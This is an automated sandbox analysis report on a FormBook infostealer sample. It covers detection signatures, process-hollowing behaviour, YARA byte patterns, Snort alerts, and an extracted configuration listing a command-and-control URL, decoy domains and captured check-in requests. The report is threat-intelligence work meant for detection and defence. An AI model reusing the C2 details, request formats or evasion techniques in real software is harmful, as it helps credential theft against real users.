Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
skyrunyyu655432.exe

Overview

General Information

Sample Name:skyrunyyu655432.exe
Analysis ID:635291
MD5:070a940ccbc84f85a8ba749eccf55618
SHA1:b6624708fa177d6a591c01ba291d40390bb6d8e7
SHA256:a734d235386d77a1c6a88bdf63efce5134a82a90e113be647200401b717b891e
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses ipconfig to lookup or modify the Windows network settings
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • skyrunyyu655432.exe (PID: 6220 cmdline: "C:\Users\user\Desktop\skyrunyyu655432.exe" MD5: 070A940CCBC84F85A8BA749ECCF55618)
    • jfotlqeoqb.exe (PID: 6364 cmdline: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\pvrclmgpss MD5: E85BB68B7CBEFADF0D1ACD4B7B8BD528)
      • jfotlqeoqb.exe (PID: 6404 cmdline: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\pvrclmgpss MD5: E85BB68B7CBEFADF0D1ACD4B7B8BD528)
        • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • ipconfig.exe (PID: 4108 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
            • cmd.exe (PID: 4468 cmdline: /c del "C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 3376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.boxberry-my.com/sn31/"], "decoy": ["matsuomatsuo.com", "104wn.com", "bolacorner.com", "dawonderer.com", "yourpamlano.xyz", "mtzmx.icu", "lepakzaparket.com", "barmagli.com", "danta.ltd", "marumaru240.com", "people-centeredhr.com", "test-brew-inc.com", "clairvoyantbusinesscoach.com", "aforeignexchangeblog.com", "erentekbilisim.com", "gangqinqu123.net", "defiguaranteebonds.com", "thegioigaubong97.site", "vaoiwin.info", "vcwholeness.com", "03c3twpfee5estjovfu2655.com", "mutantapeyachtclubtoken.store", "pixelkev.xyz", "corporacioncymaz.com", "iampro-found.com", "azureconsults.com", "bam-bong.com", "advanceresubeopene.biz", "tzjisheng.com", "krdz28.online", "ycw2009.com", "minioe.com", "dronelink.xyz", "autu.cfd", "sdwmkj.com", "uixray.xyz", "informacion-numero-24-h.site", "123dianyingyuan.com", "tj-assets.com", "usaservicedogregistratuon.com", "metagwnics.com", "pepeksquad2.host", "kc7.club", "yundtremark.com", "finance-employers.com", "euroglobalnews.info", "estudioenzetti.com", "rodosmail.xyz", "bm65.xyz", "bchmtn.net", "server4uuss.net", "maisonretraiteprivee.com", "atelierelzaaidar.com", "thegurlyboutique.com", "primobellaquartz.com", "jetskirentaldublin.com", "akmeetech.com", "withoutyoutube.com", "blackcreekwatershed.com", "89qp52.com", "e3488.com", "vote4menk.com", "tyma.club", "theceditpalooza.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.292821127.0000000001660000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.292821127.0000000001660000.00000004.00001000.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.0.jfotlqeoqb.exe.400000.9.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.0.jfotlqeoqb.exe.400000.9.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.0.jfotlqeoqb.exe.400000.9.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a49:$sqlite3step: 68 34 1C 7B E1
        • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a78:$sqlite3text: 68 38 2A 90 C5
        • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
        3.0.jfotlqeoqb.exe.400000.9.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.0.jfotlqeoqb.exe.400000.9.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 22 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.366.235.200.14749755802031412 05/27/22-18:36:55.446707
          SID:2031412
          Source Port:49755
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.366.235.200.14749755802031453 05/27/22-18:36:55.446707
          SID:2031453
          Source Port:49755
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.366.235.200.14749755802031449 05/27/22-18:36:55.446707
          SID:2031449
          Source Port:49755
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.boxberry-my.com/sn31/"], "decoy": ["matsuomatsuo.com", "104wn.com", "bolacorner.com", "dawonderer.com", "yourpamlano.xyz", "mtzmx.icu", "lepakzaparket.com", "barmagli.com", "danta.ltd", "marumaru240.com", "people-centeredhr.com", "test-brew-inc.com", "clairvoyantbusinesscoach.com", "aforeignexchangeblog.com", "erentekbilisim.com", "gangqinqu123.net", "defiguaranteebonds.com", "thegioigaubong97.site", "vaoiwin.info", "vcwholeness.com", "03c3twpfee5estjovfu2655.com", "mutantapeyachtclubtoken.store", "pixelkev.xyz", "corporacioncymaz.com", "iampro-found.com", "azureconsults.com", "bam-bong.com", "advanceresubeopene.biz", "tzjisheng.com", "krdz28.online", "ycw2009.com", "minioe.com", "dronelink.xyz", "autu.cfd", "sdwmkj.com", "uixray.xyz", "informacion-numero-24-h.site", "123dianyingyuan.com", "tj-assets.com", "usaservicedogregistratuon.com", "metagwnics.com", "pepeksquad2.host", "kc7.club", "yundtremark.com", "finance-employers.com", "euroglobalnews.info", "estudioenzetti.com", "rodosmail.xyz", "bm65.xyz", "bchmtn.net", "server4uuss.net", "maisonretraiteprivee.com", "atelierelzaaidar.com", "thegurlyboutique.com", "primobellaquartz.com", "jetskirentaldublin.com", "akmeetech.com", "withoutyoutube.com", "blackcreekwatershed.com", "89qp52.com", "e3488.com", "vote4menk.com", "tyma.club", "theceditpalooza.com"]}
          Multi AV Scanner detection for submitted file
          Source: skyrunyyu655432.exeVirustotal: Detection: 42%Perma Link
          Source: skyrunyyu655432.exeReversingLabs: Detection: 34%
          Yara detected FormBook
          Source: Yara matchFile source: 3.0.jfotlqeoqb.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.jfotlqeoqb.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.jfotlqeoqb.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jfotlqeoqb.exe.1660000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.jfotlqeoqb.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jfotlqeoqb.exe.1660000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.jfotlqeoqb.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.jfotlqeoqb.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.jfotlqeoqb.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292821127.0000000001660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.545200841.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.545564197.0000000002680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.372936782.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.290240049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.372684561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.372998768.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.337685693.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.359555357.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.545372443.0000000002600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: www.boxberry-my.com/sn31/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeReversingLabs: Detection: 36%
          Source: 2.2.jfotlqeoqb.exe.1660000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.jfotlqeoqb.exe.400000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.jfotlqeoqb.exe.400000.9.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.jfotlqeoqb.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.jfotlqeoqb.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: skyrunyyu655432.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: ipconfig.pdb source: jfotlqeoqb.exe, 00000003.00000002.373051178.00000000019D0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: jfotlqeoqb.exe, 00000003.00000002.373051178.00000000019D0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: C:\drzmu\ggsdfz\yvaw\e1787da5c4714b909513c5a841b06b91\ftesxt\xwtvbdyl\Release\xwtvbdyl.pdb source: skyrunyyu655432.exe, 00000000.00000002.321823751.000000000040B000.00000004.00000001.01000000.00000003.sdmp, skyrunyyu655432.exe, 00000000.00000002.322060613.000000000275C000.00000004.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000002.00000002.292672930.00000000001FB000.00000002.00000001.01000000.00000004.sdmp, jfotlqeoqb.exe, 00000002.00000000.279753075.00000000001FB000.00000002.00000001.01000000.00000004.sdmp, jfotlqeoqb.exe, 00000003.00000000.287892253.00000000001FB000.00000002.00000001.01000000.00000004.sdmp, ipconfig.exe, 0000000D.00000002.547054865.00000000030DF000.00000004.10000000.00040000.00000000.sdmp, nspF162.tmp.0.dr, jfotlqeoqb.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: jfotlqeoqb.exe, 00000002.00000003.291035467.000000001E160000.00000004.00001000.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000002.00000003.290469489.000000001DFD0000.00000004.00001000.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000003.293986604.0000000001865000.00000004.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000003.292333571.00000000016D0000.00000004.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000002.373260356.0000000001B1F000.00000040.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000002.373075677.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000002.546062335.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000002.546473284.0000000002CCF000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000003.372760279.0000000002877000.00000004.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000003.375023667.0000000002A13000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: jfotlqeoqb.exe, 00000002.00000003.291035467.000000001E160000.00000004.00001000.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000002.00000003.290469489.000000001DFD0000.00000004.00001000.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000003.293986604.0000000001865000.00000004.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000003.292333571.00000000016D0000.00000004.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000002.373260356.0000000001B1F000.00000040.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000002.373075677.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 0000000D.00000002.546062335.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000002.546473284.0000000002CCF000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000003.372760279.0000000002877000.00000004.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000003.375023667.0000000002A13000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeCode function: 0_2_00405426 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeCode function: 0_2_00405D9C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeCode function: 0_2_004026A1 FindFirstFileA,
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.dawonderer.com
          Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.147 80
          Source: C:\Windows\explorer.exeDomain query: www.bolacorner.com
          Source: C:\Windows\explorer.exeNetwork Connect: 52.71.57.184 80
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49755 -> 66.235.200.147:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49755 -> 66.235.200.147:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49755 -> 66.235.200.147:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.boxberry-my.com/sn31/
          Source: global trafficHTTP traffic detected: GET /sn31/?m6R01xM0=qZl/JLX84vnD5ytzVzk0/a0Hcpketn5qZPO1CaBkWF6tW2qs6ow5h/A/zRQwl5G72f7o&nPqD=gvLpMpxpWl HTTP/1.1Host: www.dawonderer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sn31/?m6R01xM0=f82GdrL9BOGPadRnOYEWsPSt+bOR3tUYa+dCVqOhmg/09rEzcw7t3bM5PuUufbFtM3zx&nPqD=gvLpMpxpWl HTTP/1.1Host: www.bolacorner.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.71.57.184 52.71.57.184
          Source: ipconfig.exe, 0000000D.00000002.547196966.00000000035CF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.hugedomains.com/domain_profile.cfm?d=bolacorner.com
          Source: unknownDNS traffic detected: queries for: www.dawonderer.com
          Source: global trafficHTTP traffic detected: GET /sn31/?m6R01xM0=qZl/JLX84vnD5ytzVzk0/a0Hcpketn5qZPO1CaBkWF6tW2qs6ow5h/A/zRQwl5G72f7o&nPqD=gvLpMpxpWl HTTP/1.1Host: www.dawonderer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sn31/?m6R01xM0=f82GdrL9BOGPadRnOYEWsPSt+bOR3tUYa+dCVqOhmg/09rEzcw7t3bM5PuUufbFtM3zx&nPqD=gvLpMpxpWl HTTP/1.1Host: www.bolacorner.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: jfotlqeoqb.exe, 00000002.00000002.293051588.000000000170A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeCode function: 0_2_00404FDD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.0.jfotlqeoqb.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.jfotlqeoqb.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.jfotlqeoqb.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jfotlqeoqb.exe.1660000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.jfotlqeoqb.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jfotlqeoqb.exe.1660000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.jfotlqeoqb.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.jfotlqeoqb.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.jfotlqeoqb.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292821127.0000000001660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.545200841.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.545564197.0000000002680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.372936782.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.290240049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.372684561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.372998768.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.337685693.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.359555357.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.545372443.0000000002600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.0.jfotlqeoqb.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.jfotlqeoqb.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.jfotlqeoqb.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.jfotlqeoqb.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.jfotlqeoqb.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.jfotlqeoqb.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.jfotlqeoqb.exe.1660000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.jfotlqeoqb.exe.1660000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.jfotlqeoqb.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.jfotlqeoqb.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.jfotlqeoqb.exe.1660000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.jfotlqeoqb.exe.1660000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.jfotlqeoqb.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.jfotlqeoqb.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.jfotlqeoqb.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.jfotlqeoqb.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.jfotlqeoqb.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
